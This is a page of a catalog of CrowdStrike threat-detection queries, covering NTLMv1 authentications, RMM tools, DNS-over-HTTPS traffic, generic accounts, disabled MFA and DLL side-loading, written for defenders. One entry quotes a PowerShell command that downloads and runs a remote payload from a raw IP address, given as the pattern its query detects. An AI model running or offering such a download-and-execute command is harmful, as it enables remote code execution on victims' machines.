EXPLORE DETECTIONS

298 detections found

Detect NTLMv1 Authentications

This query detects NTLM v1 authentications using Falcon ITP telemetry. [Closing the Door on Net-NTLMv1: Releasing Rainbow Tables to Accelerate Protocol Deprecation](https://cloud.google.com/blog/topics/threat-intelligence/net-ntlmv1-deprecation-rainbow-tables?linkId=38338466&hl=en)

CrowdStrike

Detect NTLMv1 Authentications (Windows Event Logs)

This query detects NTLM v1 authentications using Windows Event Log telemetry. [Closing the Door on Net-NTLMv1: Releasing Rainbow Tables to Accelerate Protocol Deprecation](https://cloud.google.com/blog/topics/threat-intelligence/net-ntlmv1-deprecation-rainbow-tables?linkId=38338466&hl=en)

CrowdStrike

Detect Remote Monitoring and Management (RMM) Tools over DNS

This query identifies the presence or execution of common RMM utilities (e.g., AnyDesk, TeamViewer, ConnectWise, ScreenConnect, Splashtop). While these tools are legitimate and widely used for IT administration, adversaries often abuse them as “living-off-the-land” remote access backdoors. Because they operate under the guise of trusted software and can blend with normal activity, malicious use of RMM tools may bypass traditional security controls, enabling persistence, data exfiltration, or hands-on-keyboard attacks.

T1219.002
CrowdStrike

Detect RTR High Risk Commands

Detects the execution of high-risk RTR commands such as get, put, memdump, xmemdump, run and put-and-run.

CrowdStrike

Detect Suspicious Windows Command-Line Activity Using System Utilities

The query analyzes Windows ProcessRollup2 events to identify unusual use of common administrative tools (e.g., net.exe, sc.exe, nltest.exe, systeminfo.exe). It assigns behavior weights based on command-line patterns, aggregates activity per host and hour, flags systems with high or frequent activity, and provides direct links for host investigation in Falcon. Reference: [GitHub CrowdStrike/logscale-community](https://github.com/CrowdStrike/logscale-community-content/blob/main/Queries-Only/Helpful-CQL-Queries/Custom%20Weighting%20Command%20Line%20and%20File%20Name.md)

CrowdStrike

Detection of DNS Requests to AI-Related Domains

This query identifies DNS requests to domains listed in the AI-Domains.csv lookup. It filters out browser-initiated traffic from Chrome and Edge. The result highlights which hosts and processes are generating the most DNS requests to those domains. The query relies on a lookup file with at least one column named Domain; the lookup provides the set of AI-related domains to check against. Without this file, the match() operator cannot resolve which DNS requests should be considered relevant.

**Example**

| Domain |
|---|
| chat.openai.com |
| chatgpt.com |
| openai.com |
| claude.ai |
| anthropic.com |
| bard.google.com |
| *.ai |
| *.openai.com |

CrowdStrike

Detection of DoH traffic to known DoH-providers

This query identifies network traffic to well-known DoH endpoints (e.g., Cloudflare, Google, Quad9, Mozilla). DNS over HTTPS (DoH) encrypts DNS queries by tunneling them through HTTPS, making them indistinguishable from regular web traffic. While this improves user privacy, it creates blind spots for defenders: adversaries can exploit DoH to bypass DNS-based filtering, hide access to phishing domains, establish stealthy command-and-control channels, or exfiltrate data without triggering traditional DNS logs. Monitoring and alerting on DoH connections helps restore visibility into DNS activity, one of the most critical layers of network defense.

Why it matters:
- Phishing domains can be accessed without triggering DNS-based filtering.
- Command-and-Control (C2) communication can blend into normal HTTPS traffic.
- Data exfiltration becomes harder to detect as destination domains are hidden.

Impact on organizations: Without proper monitoring or controls, DoH can undermine DNS visibility, one of the most critical layers in network security, allowing threats to go unnoticed.

CrowdStrike

Detection of External Direct IP Usage in CommandLine Windows and Mac

This query detects Windows processes that utilize raw public IP addresses within HTTP/HTTPS URLs in their command-line arguments (e.g., powershell -c IEX(New-Object Net.WebClient).DownloadString('http://1.2.3.4/payload')). This behavior is highly suspicious because legitimate software typically uses domain names (DNS). Attackers often use direct public IPs to host second-stage payloads or C2 servers to bypass DNS filtering and logging mechanisms.

Key Logic Breakdown

- Scope & Filter: Targets Windows process creation events (ProcessRollup2). Filters for command lines containing http.
- Exclusions: Removes known noisy applications (e.g., Chrome, HP Click, Umbrella) to reduce false positives.
- Extraction (Regex): Scans the command line to extract a URL specifically formatted with an IPv4 address (e.g., http://x.x.x.x/...) and isolates the IP address from that URL into a field called Ipaddress.
- Public IP Validation: Uses !cidr(...) to exclude all standard private and reserved IP ranges (localhost, 10.x, 192.168.x, 172.16.x, APIPA, etc.), so the query only alerts on public/external IPs.
- Formatting & Triage: Generates a clickable ExecutionSummary that includes the parent process, the target image, and the specific command line, plus direct links (ProcessExplorer, GraphExplorer) to the Falcon console for immediate investigation.
- Aggregation: Results are grouped by ComputerName, showing how many times the event occurred and the first/last time it was seen.

T1105, T1059, T1071.001
CrowdStrike

Detection of Generic User Account Usage

This query identifies the use of generic or shared user accounts by leveraging a predefined lookup file containing known default and non-personalized usernames (e.g., admin, test, root).

| Framework | Primary Reason | Specific Source / Control |
|---|---|---|
| PCI DSS | Individual Accountability | Requirement 8.2.1 |
| HIPAA | Traceability of PHI Access | 45 CFR § 164.312(a)(2)(i) |
| ISO 27001 | Privileged Access Control | Annex A 5.15 / 8.2 |
| NIST 800-53 | Risk Management | AC-2(9) |
| SOC 2 | Auditability | CC6.1 |

T1078
CrowdStrike

Device Code Sign-In

Detects authentication events using the device code flow as identified by Microsoft Defender for Identity, where a user enters a code on a separate device to complete sign-in. While commonly used for legitimate scenarios, this method can be abused by attackers to perform phishing-based authentication or bypass traditional sign-in monitoring.

T1550
CrowdStrike

Devices in RFM state

CrowdStrike

Disable Strong Authentication (Microsoft Entra ID)

Detects when strong authentication methods (such as MFA) are disabled or weakened for a user account in Microsoft Entra ID. This action reduces account security and may indicate a legitimate administrative change or a potential attempt to bypass authentication controls, and should be reviewed.

T1556
CrowdStrike

Dll-Side Loading Detection Query

The query traces processes that write both DLL and EXE files to the same location while exhibiting masquerading behavior. Reference: [GitHub Aamir-Muhammad/CrowdStrike-Queries](https://github.com/Aamir-Muhammad/CrowdStrike-Queries/blob/main/Hunting-Queries/DLL-Side-Loading-Detection.md)

T1574.001
CrowdStrike

Page 4 of 13